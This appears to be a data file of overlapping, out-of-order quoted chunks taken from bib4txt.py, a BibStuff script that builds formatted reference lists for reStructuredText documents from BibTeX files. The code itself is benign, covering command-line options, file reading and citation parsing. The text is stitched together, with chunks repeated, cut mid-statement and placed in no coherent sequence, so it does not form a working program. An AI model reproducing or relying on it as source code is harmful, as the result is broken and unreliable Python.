"ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar cite_parser =",
"metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\",",
"object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references",
"os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\"",
"#parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\",",
"files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(),",
"definitions, to be used in the References section of your documents. :author: <NAME>",
"2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you should have",
"option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg)",
"manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites",
"action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\")",
"python # bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for",
"set when this file is run as a script # style # bibfile_processor",
"metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\",",
"be used in the References section of your documents. :author: <NAME> :date: 2006-07-27",
"import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except",
"note that the standard separator for multiple keys in one citation reference is",
"\"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\") stylename",
"text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation",
"user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style",
"<NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note:",
"Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib",
"src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also",
"by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\",",
"for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename",
"name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\",",
"result = cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################",
"files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases",
"= bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the",
"Extracts the citation references from the input document. - Outputs a sorted list",
"cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make citations') result",
"= os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \"",
"\"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec vs",
"can be output with formatted citation references substituted for the citation keys. In",
"currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal",
"is now (2008) legal in reST and will be recognized by bib4txt. -",
"dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in",
"the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor",
"bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be",
"reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\",",
"run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff",
"action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\",",
"keys in one citation reference is a comma # CITATION_SEP = ',' #",
"not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use -n",
"object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib",
"to process cites during src parsing # (and associate it with the citation_manager)",
"parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\",",
"parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result)",
"importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around",
"files for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into",
"to convert an EBNF_ grammar into an object for scanning .bib files. (See",
"with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name )",
"an EBNF_ grammar into an object for scanning reST files for citation references.",
"\"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",",
"it works: - Uses SimpleParse_ to convert an EBNF_ grammar into an object",
"source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a",
"source document can be output with formatted citation references substituted for the citation",
"try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow",
"separator for multiple keys in one citation reference is a comma # CITATION_SEP",
"a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire",
"bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ == '__main__':",
"a sort-key on which to base the sorting :note: Sorting is style dependent---e.g.,",
"print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making",
"- the keys for the citations referenced - a sort-key on which to",
"text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without",
"file %s already exists: Use -n option to nuke (overwrite) this file. PLEASE",
"except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec =",
"<NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_)",
":note: Now cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager",
"ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\",",
"SimpleParse (binaries available!) - BibStuff (which you should have if you have this)",
"2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib)",
"add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import",
"standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import",
"fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings",
"mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile =",
"# note that the standard separator for multiple keys in one citation reference",
"file. You can then include this in your reST document with an ``include``",
"_usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n",
"default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style",
"for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into an",
"open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if",
"See bib4txt.py -h for help. \"\"\" #set default input and output _infile =",
"-f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([",
"have this) The source text file should include citation references in reStructuredText format:",
"args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line option #TODO:",
"references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\")",
"infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography",
"to be written to a separate file. You can then include this in",
"if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file",
"added to the end of the file. A slight modification of the reStructuredText",
"\"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE",
"``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by bib4txt.",
"a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file",
"grammar into an object for scanning reST files for citation references. - Uses",
"read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string:",
"if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default:",
"#local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack",
"that the standard separator for multiple keys in one citation reference is a",
"SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST files",
"document, if desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n'",
"try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept",
"handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create",
"(an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list",
"BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser =",
"action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The",
"= style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src",
".. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext",
"help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2:",
"substituted for the citation keys. In this case, the reference list is added",
"which to base the sorting :note: Sorting is style dependent---e.g., might sort entries",
"logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the",
"else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to",
"#import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger =",
"<NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO:",
"default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0,",
"to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation",
"sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in the associate",
"file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\",",
"bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not",
"_outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string =",
"parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib",
"\".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\")",
"print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles",
"= ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar cite_parser",
"1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document,",
"\"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec",
"-n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile)",
":contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows",
"references from the input document. - Outputs a sorted list of citation definitions,",
"higher - SimpleParse (binaries available!) - BibStuff (which you should have if you",
"dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\",",
"the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in",
"= cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def",
"bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\")",
"workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file",
"for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg =",
"ebnf_sp except ImportError: #hack to allow user to run without installing scriptdir =",
"keys. In this case, the reference list is added to the end of",
"= \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import",
".bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError:",
"imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a",
"brackets, followed by an underscore. Citation keys cannot be all digits. The source",
"bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to",
"citation references substituted for the citation keys. In this case, the reference list",
"from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some",
"entire document, if desired if not citations_only: result = cite_processor.__repr__() + result return",
"Interacts with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: -",
"../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ###################",
"if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec =",
"from the input document. - Outputs a sorted list of citation definitions, to",
"your reST document with an ``include`` directive. How it works: - Uses SimpleParse_",
"action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify",
"http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__",
".. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ =",
"the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore",
"SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib files.",
"style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to",
"\"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\",",
"-s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename:",
"action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False,",
"grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts",
"# bibfile_processor # note that the standard separator for multiple keys in one",
"make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and",
"= \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o",
"style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if args.outfile: if",
"do so need: - the keys for the citations referenced - a sort-key",
"style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\")",
"references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\",",
"\"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also associated with",
"style based on `stylefile` command-line option #TODO: add error handling for unknown styles",
"parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor =",
"logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from",
"and will be recognized by bib4txt. - Comma separted multiple keys are permitted",
"citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets,",
"!= \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\")",
"recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename",
"bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the bibfile_processor",
"standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage)",
"this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w')",
"(binaries available!) - BibStuff (which you should have if you have this) The",
"_EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\"",
":license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt",
"#import dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles,",
"is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager",
"= {} #work around Python 2 exec vs Python 3 exec exec(str2exec, {},",
":note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note:",
"bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill",
"in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename",
"open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile",
"Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is",
"bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import",
"IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool.",
"be all digits. The source document can be output with formatted citation references",
"= ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation",
"= os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f",
"for reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX or",
"experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to",
"simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor = bibfile.BibFile()",
":author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see",
"make a sorted entry list. To do so need: - the keys for",
":note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME>",
"\"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager to handle",
"+ result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings",
"\" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style",
"bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager')",
"in brackets, followed by an underscore. Citation keys cannot be all digits. The",
"#hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir =",
"definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend",
"style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile`",
"around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style =",
"(.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX",
"parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO",
"by bib4txt. - Comma separted multiple keys are permitted in a cite: e.g.,",
"In this case, the reference list is added to the end of the",
"%(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\"",
"messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire",
"by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files",
"encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile,",
"# CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style,",
"parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\",",
"default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style",
"\"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names =",
":copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database",
"DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output",
"is *not* legal reST. The intent is for the formatted references to be",
"cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy",
"if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did",
") #import a bibliography style based on `stylefile` command-line option #TODO: add error",
"http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an underscore. Citation",
"type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\",",
"Now cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager which",
"\" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) )",
"allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0,",
"bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object",
"create CiteRefProcessor object to process cites during src parsing # (and associate it",
"dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp",
"`taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist =",
"is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor)",
"keys. It is also associated with citation_manager which holds the bibliography, so we",
"so need: - the keys for the citations referenced - a sort-key on",
"the citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys =",
"help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO",
"currently recommended to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else:",
"outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based",
"\"\"\" # open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile)",
"option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script",
"the -f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info(",
"2 did not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot",
"keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST.",
"Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which",
"dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\",",
"output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite:",
"logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar,",
"#set default input and output _infile = sys.stdin _outfile = sys.stdout from argparse",
"stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass",
"from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage:",
"references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed",
"can make a sorted entry list. To do so need: - the keys",
"vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as",
"files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document.",
"ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on",
"unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround",
"a sorted entry list. To do so need: - the keys for the",
"sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile = open(args.infile,",
"end of the file. A slight modification of the reStructuredText ``cite`` directive is",
"stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output",
"bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only =",
"{}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output",
"to the end of the file. A slight modification of the reStructuredText ``cite``",
"fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def",
"The source document can be output with formatted citation references substituted for the",
"section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by",
"PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read",
"multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal",
"based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to",
"associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ ..",
"= citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only: result",
